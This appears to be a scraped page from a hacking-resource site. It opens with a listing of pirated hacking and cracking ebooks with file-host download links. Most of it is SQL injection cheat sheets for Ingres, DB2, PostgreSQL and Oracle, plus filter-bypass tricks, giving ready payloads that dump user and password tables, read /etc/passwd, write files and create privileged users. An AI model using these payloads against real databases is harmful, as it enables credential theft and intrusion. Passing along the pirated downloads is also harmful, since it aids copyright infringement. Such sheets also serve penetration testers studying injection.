--
0

Hacking the art or exploitation TOOLS Video Training | 469.13 MB

Going beyond the issues of analyzing and optimizing programs as well as creating the means of protecting information, this guide takes on the programming problem of how to go about disassembling a program with holes without its source code. Detailing hacking methods used to analyze programs using a debugger and disassembler such as virtual functions, local and global variables, branching, loops, objects and their hierarchy, and mathematical operators, this guide covers methods of fighting disassemblers, self-modifying code in operating systems, and executing code in the stack.
* Hacking and Cracking
- Hacking for Dummies Apr 2004.pdf
- CD Cracking Uncovered – Protection Against Unsanctioned CD Copying.chm
- eBook – Hacking – Maximum Security-A Hacker’s Guide to Prote.pdf
- eBook O’Reilly – Hacking TCP IP Security.pdf
- Excel Hacks – 100 Industrial-Strength Tips & Tools.chm
- Hacker Disassembling Uncovered (2003).chm
- Hackers Beware (2001).pdf
- Hacker’s Delight.chm
- Hacking – Firewalls And Networks How To Hack Into Remote Computers.pdf
- Hacking – Hack Proofing Your Network – Internet Tradecraft.pdf
- Hacking – The Art Of Exploitation (2003).chm
- Hacking – The Art Of Exploitation.chm
- Hacking Access to Other Peoples Systems Made Simple.pdf
- hacking exposed – chapter16 – hacking the internet user.pdf
- Hacking for Beginers.rar
- Hacking Knoppix.chm
- Hacking-Maximum Security A Hackers Guide To Protecting Your Internet Site and Network.pdf
- Hardware Hacking – Have Fun While Voiding Your Warranty.pdf
- PC Hacks – 100 Industrial-Strength Tips & Tools.chm
- PDF Hacks – 100 Industrial-Strength Tips & Tools.chm
- Retro Gaming Hacks – Tips & Tools For Playing The Classics.chm
- Wi-Foo – The Secrets Of Wireless Hacking.chm
* Hackers Black Book
- 2_Hackers Blackbook-Eng.pdf
- Ebooks – The Hackers Blackbook (1).pdf
- Hackers Black Book.rar
- Hackers Blackbook.pdf
- hackers_blackbook.pdf
Code:
http://hotfile.com/dl/75200664/b244df5/37Cracking-Hacking-Assembling-Disassembling.part1.rar.html
http://hotfile.com/dl/75200691/d4bbf89/37Cracking-Hacking-Assembling-Disassembling.part2.rar.html
http://hotfile.com/dl/75200717/dc649ed/37Cracking-Hacking-Assembling-Disassembling.part3.rar.html
http://hotfile.com/dl/75200834/97c8574/37Cracking-Hacking-Assembling-Disassembling.part4.rar.html
http://hotfile.com/dl/75200983/d802229/37Cracking-Hacking-Assembling-Disassembling.part5.rar.html

, , ,
--
0

References and Credits:

References and Credits:
Related articles:
External links:

--
0

Bypass SQL Injection Filters

» Bypass SQL Injection Filters
PayloadDescription (if any)
select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39))Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.
select * from login where user = char(39,97,39)Using char() to bypass restrictions.

--
0

Ingres

» Ingres
PayloadDescription (if any)
Comments
Normal “–” and C-style /**/ comments are allowed:
select 123; — sdfjsdlkfj
select 123; /* sdfsdf */ 
 Batching Queries Allowed?
Not via DBI in PERL.  Subsequent statements seem to get ignored:
select blah from table where foo = 1; select … doesn’t matter this is ignored. 
 Database Versionselect dbmsinfo(’_version’);
 Current Database Userselect dbmsinfo(’session_user’);
 System User for Current Connectionselect dbmsinfo(’system_user’);
 Current Databaseselect dbmsinfo(’database’);
 Limiting Rows Returned
select top 10 blah from table;
select first 10 blah form table; 
 Returning N Rows starting at Offset M
Astoundingly, this doesn’t seem to be possible!
 List Tables
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’; 
 List Columnsselect column_name, column_datatype, table_name, table_owner from iicolumns;
 List Databse Users and Passwords
First connect to iidbdb, then:
select name, password from iiuser; 
 FROM clause mandated in SELECTs?
No.  You don’t need to select form “dual” or anything.  The following is legal:
select 1; 
 UNION supported
Yes.  Nothing tricky here.  The following is legal:
select 1 union select 2; 
 Enumerate Tables Privsselect table_name, permit_user, permit_type from iiaccess;
 Enumerate Current Privs
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
 Length of a stringselect length(’abc’); — returns 3
 Bitwise AND
The function “bit_and” exists, but seems hard to use.  Here’s an
example of ANDing 3 and 5 together.  The result is a “byte” type
with value \001:
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
 Substringselect substr(’abc’, 2, 1); — returns ‘b’
 ASCII value of a character ??? 
(The “ascii” function exists, but doesn’t seem to do what I’d expect.)
 Roles and passwords
First you need to connect to iidbdb, then: 
select roleid, rolepass from iirole;
List Database Procedures
First you need to connect to iidbdb, then:
select dbp_name,  dbp_owner from iiprocedure;
Create Users + Granting Privs
First you need to connect to iidbdb, then:
create user pm with password = ‘password’;
grant all on current installation to pm; 
 Time Delays???
 Execute OS Commands???
 Write to File System???
 Concatenation select ‘abc’ || ‘def’;
 Casting select cast(123 as varchar);
select cast(’123′ as integer);

--
0

DB2

» DB2
PayloadDescription (if any)
Commentsselect blah from foo; — comment like this
 Batching Queries Allowed????
 Database Version
select versionnumber, version_timestamp from sysibm.sysversions;
 Current Database User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
 System User for Current Connectionselect system_user from sysibm.sysdummy1;
 Current Databaseselect current server from sysibm.sysdummy1;
 Limiting Rows Returned
SELECT foo FROM bar fetch first 1 rows only;
Returning N Rows starting at Offset Mselect name from (SELECT name FROM sysibm.systables order by 
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
 List Tablesselect name from sysibm.systables;
 List Columnsselect name, tbname, coltype from sysibm.syscolumns;
 List Databse Users and PasswordsDatabase authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
 FROM clause mandated in SELECTs?Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1;
 UNION supportedYes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;
 Enumerate Tables Privsselect * from syscat.tabauth;
 Enumerate Current Privsselect * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
 Length of a stringselect name, tbname, coltype from sysibm.syscolumns; — returns 3
 Bitwise ANDThis page seems to indicate that DB2 has no support for bitwise operators!
 Substring
SELECT SUBSTR(’abc’,2,1) FROM sysibm.sysdummy1;  — returns b
 ASCII value of a characterselect ascii(’A') from sysibm.sysdummy1; — returns 65
Character from ASCII valueselect chr(65) from sysibm.sysdummy1; — returns ‘A’
 Roles and passwordsN/A (I think DB2 uses OS-level user accounts for authentication.)
List Database Procedures ???
Create Users + Granting Privs ???
 Time Delays ???
 Execute OS Commands ???
 Write to File System ???
 ConcatenationSELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’
 CastingSELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;
List schemasSELECT schemaname FROM syscat.schemata;

--
0

PostgreSQL

» PostgreSQL
PayloadDescription (if any)
select version();View database version.
select current_database();Misc. information disclosure
select current_user;Misc. information disclosure
select session_user;Misc. information disclosure
select current_setting(’log_connections’);Misc. information disclosure
select current_setting(’log_statement’);Misc. information disclosure
select current_setting(’port’);Misc. information disclosure
select current_setting(’password_encryption’);Misc. information disclosure
select current_setting(’krb_server_keyfile’);Misc. information disclosure
select current_setting(’virtual_host’);Misc. information disclosure
select current_setting(’port’);Misc. information disclosure
select current_setting(’config_file’);Misc. information disclosure
select current_setting(’hba_file’);Misc. information disclosure
select current_setting(’data_directory’);Misc. information disclosure
select * from pg_shadow;View database usernames and passwords.
select * from pg_group;View database usernames and passwords.
create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile;Read files on the filesystem.
copy myfile to ‘/tmp/test’;Write files to filesystem.
str1 || str2Concat strings for blind SQL Injection tests.

--
0

Oracle

» Oracle
Robert Hurlbut has put together an awesome document on Oracle SQL Injection. He seems to have far more experience in this area then I, so i will merely present a link to his blog entry on this topic (http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx).
PayloadDescription (if any)
str1 || str2 OR CONCAT (str1, str2)Concat strings for blind SQL Injection tests.